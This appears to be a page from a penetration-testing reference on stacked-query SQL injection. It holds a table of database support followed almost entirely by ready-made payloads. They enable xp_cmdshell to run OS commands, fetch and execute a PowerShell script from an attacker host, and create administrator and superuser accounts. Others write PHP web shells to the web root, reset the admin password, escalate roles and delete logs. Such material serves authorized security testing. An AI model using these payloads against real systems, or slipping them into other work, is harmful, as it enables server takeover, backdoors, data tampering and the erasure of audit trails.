Overview
Execute multiple SQL statements separated by;. Unlike UNION/error-based, stacked queries can run INSERT, UPDATE, DELETE, and administrative commands. Not all databases/drivers support this.
Documentation Index
Fetch the complete documentation index at: /llms.txt
Use this file to discover all available pages before exploring further.
Stacked queries SQL injection: execute multiple statements to modify data, create users, and gain RCE.
;. Unlike UNION/error-based, stacked queries can run INSERT, UPDATE, DELETE, and administrative commands. Not all databases/drivers support this.
| Database | Supported | Notes |
|---|---|---|
| MSSQL | Yes | Full support |
| PostgreSQL | Yes | Full support |
| MySQL | Depends | Only with mysqli_multi_query() or PDO with ATTR_EMULATE_PREPARES |
| SQLite | Yes | Via some drivers |
| Oracle | No | Not supported |
'; EXEC xp_cmdshell 'whoami'-- -
'; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;-- -
'; EXEC('net user hacker Password123! /add'); EXEC('net localgroup administrators hacker /add')-- -
'; EXEC xp_cmdshell 'powershell -c "iex(iwr http://ATTACKER/shell.ps1)"'-- -
'; CREATE TABLE cmd(output text); COPY cmd FROM PROGRAM 'id';-- -
'; CREATE USER hacker WITH PASSWORD 'pass123' SUPERUSER;-- -
'; COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';-- -
'; SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';-- -
'; CREATE USER 'hacker'@'%' IDENTIFIED BY 'pass123'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%';-- -
'; INSERT INTO users (username,password,role) VALUES ('hacker','pass123','admin');-- -
'; UPDATE users SET role='admin' WHERE username='hacker';-- -
'; UPDATE users SET password='newpass' WHERE username='admin';-- -
'; DELETE FROM logs WHERE 1=1;-- -
'; SELECT SLEEP(5);-- - # MySQL
'; WAITFOR DELAY '0:0:5';-- - # MSSQL
'; SELECT pg_sleep(5);-- - # PostgreSQL
| Database | Payload |
|---|---|
| MSSQL RCE | '; EXEC xp_cmdshell 'whoami'-- - |
| PostgreSQL RCE | '; COPY cmd FROM PROGRAM 'id'-- - |
| MySQL write | '; SELECT ... INTO OUTFILE '/path'-- - |
| Insert user | '; INSERT INTO users VALUES(...)-- - |
| Update role | '; UPDATE users SET role='admin'-- - |